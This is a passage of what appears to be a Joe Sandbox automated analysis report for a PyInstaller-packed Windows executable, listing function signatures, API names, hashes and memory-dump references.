                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                            • Opcode ID: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
                                                                                                                                                                                            • Instruction ID: 7a9e1e495418c972c1d0151693bd8a416af8bdbaa9308eb53577ede785f30795
                                                                                                                                                                                            • Opcode Fuzzy Hash: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7FF06D66B0A20B81FF55F7E25C113B692905F89B90FCC4031C90E867C2EF9CE8808330
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF70126FE74,?,?,?,00007FF701271386,?,?,?,?,?,00007FF701272979), ref: 00007FF70127CB3A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                            • Opcode ID: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
                                                                                                                                                                                            • Instruction ID: ee4d6ec6d3cd8b1294dd63fb66844c8e989d4a36421d90f5ff8335fda1795e5e
                                                                                                                                                                                            • Opcode Fuzzy Hash: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF05850F0D28786FF24B6B25C106B6D1808F587A0F882630E82E866C2EFACE450E330
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CriticalDeleteSection
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 166494926-0
                                                                                                                                                                                            • Opcode ID: 9ef270cfb0ab7400d48e0fe38d2644e6c95eb7ccd7ebf23eed1a1cc8127eea07
                                                                                                                                                                                            • Instruction ID: ee38339ff9f2a887bf22c313ecd351ab315d468cc7e8d473376de7673e1391c0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ef270cfb0ab7400d48e0fe38d2644e6c95eb7ccd7ebf23eed1a1cc8127eea07
                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F03061F0C90382FB04FBA5DC8137993D0EF88B64FC00032D90D462628F9CA4E08331
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 377330604-0
                                                                                                                                                                                            • Opcode ID: c3d8e65f87bbbe63c14fee6a743a0867f8cd2a1bbf6229e1434371584278ccdb
                                                                                                                                                                                            • Instruction ID: a638ac9aeedf6dd71e3b3548e03203639867a59e6bafb572acbca78443b59b3b
                                                                                                                                                                                            • Opcode Fuzzy Hash: c3d8e65f87bbbe63c14fee6a743a0867f8cd2a1bbf6229e1434371584278ccdb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C417516E1CA8681E711AB24A9153FDB370FFA5748F949232DF8D421D3EF68A5D8C320
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                            • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                                                                                            • API String ID: 190572456-3109299426
                                                                                                                                                                                            • Opcode ID: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
                                                                                                                                                                                            • Instruction ID: 0f6fb6c03c0bf042be470ee06d94c7073ac7da37dfaf59694adba121042c64e7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 46427064B0BB8791FB59FB08AD50174A3A1AF04794BD4503AC84E46BA4FFFCB55AD230
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                            • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                            • API String ID: 2446303242-1601438679
                                                                                                                                                                                            • Opcode ID: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
                                                                                                                                                                                            • Instruction ID: b3edc96a2268a56e30079d1d93567be48048af881ed4aa437950f98155c11848
                                                                                                                                                                                            • Opcode Fuzzy Hash: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CA16B36319B8287E7149F11E95479AB370FB88B94F904126DB8D43B24CFBDE165CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                            • API String ID: 808467561-2761157908
                                                                                                                                                                                            • Opcode ID: ccfbaf94e8ba692c66e947d25492209142ad6238170979dce7e9a2c25c803b1f
                                                                                                                                                                                            • Instruction ID: 071e17741db6f0bf7c707f2e97203e5206a1728b5343a7da735a69b5bd4525cb
                                                                                                                                                                                            • Opcode Fuzzy Hash: ccfbaf94e8ba692c66e947d25492209142ad6238170979dce7e9a2c25c803b1f
                                                                                                                                                                                            • Instruction Fuzzy Hash: B2B2C172B192838BE725EE68D8407FDB7A1FF54788F905135DA0997E84DBB8E9008B50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00007FF70126269E,?,?,?,?,?,?,?,?,?,?,?,00007FF70126101D), ref: 00007FF701267507
                                                                                                                                                                                            • FormatMessageW.KERNEL32 ref: 00007FF701267536
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF70126758C
                                                                                                                                                                                              • Part of subcall function 00007FF701262620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF701267774,?,?,?,?,?,?,?,?,?,?,?,00007FF70126101D), ref: 00007FF701262654
                                                                                                                                                                                              • Part of subcall function 00007FF701262620: MessageBoxW.USER32 ref: 00007FF701262730
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                            • API String ID: 2920928814-2573406579
                                                                                                                                                                                            • Opcode ID: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
                                                                                                                                                                                            • Instruction ID: f02d879ddedcf2a18d538d46ac834d5575b87f67cdc68373be67a896c3f19575
                                                                                                                                                                                            • Opcode Fuzzy Hash: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A213D61B19A4382E724AB15FC502A6B261BF48784FC40135E54D82AD5EFBCE555C720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                            • Opcode ID: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
                                                                                                                                                                                            • Instruction ID: c3fd6aacd5dd5c95240dbd35238de2e3f08e6d4336946e04b85a5bff252800df
                                                                                                                                                                                            • Opcode Fuzzy Hash: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E313072709A828AEB60AF64E8403EDB365FF44744F84443ADA4D87B98DF7CD548C720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                            • Opcode ID: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
                                                                                                                                                                                            • Instruction ID: f36453a46d68c0c790014b07b7d497dc6952787cf339bdf64bbea639ca4f79f3
                                                                                                                                                                                            • Opcode Fuzzy Hash: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
                                                                                                                                                                                            • Instruction Fuzzy Hash: E0315F32718B8286DB60DB25E8402AEB3A4FF88794F900136EA9D43B94DF7CD5558B10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                            • Opcode ID: aa90af6a4a788c2c16a02cea0e9581d0bf20e05c721b47e02ac586f09149659d
                                                                                                                                                                                            • Instruction ID: 1c2afa7db2f36d6bf6f46e57dad3bd804856247f99e4064b23ebb223e32dd709
                                                                                                                                                                                            • Opcode Fuzzy Hash: aa90af6a4a788c2c16a02cea0e9581d0bf20e05c721b47e02ac586f09149659d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 78B18F22B1A69741EB60AF219C006BEE290EF45BE4F844132FE5D87E95EFBCE445C314
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                            • Opcode ID: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
                                                                                                                                                                                            • Instruction ID: af94dd0f1decea7ab14f8986f8bc9191eded118d72317db881bb887384888f0c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 72118222B15F0689EB00DF60EC452B873A4FB18758F840E31DA6D83BA8DFBCD1948390
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                            • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                            • Instruction ID: ff70316554064c80d62772ba979b8196ddb78ea098115f04fd5b43e57edc27b3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                            • Instruction Fuzzy Hash: ECC1F672B1A28687D724DF19A44466AF7A1FB94B84F848135DB4E83B84DB7DE901CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 15204871-0
                                                                                                                                                                                            • Opcode ID: 100244ad11a5ca47b3e63d731413f73159be8c16d425433171175cfe94e11ddb
                                                                                                                                                                                            • Instruction ID: 83d30b219a21a0438cf0aeedd9fbc4528af109dbd81f04125295d935ac4e687b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 100244ad11a5ca47b3e63d731413f73159be8c16d425433171175cfe94e11ddb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5EB18073601B8A8BEB19DF29C84636C77E0FB44B48F988921DB5D83BA4CB79D451C710
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
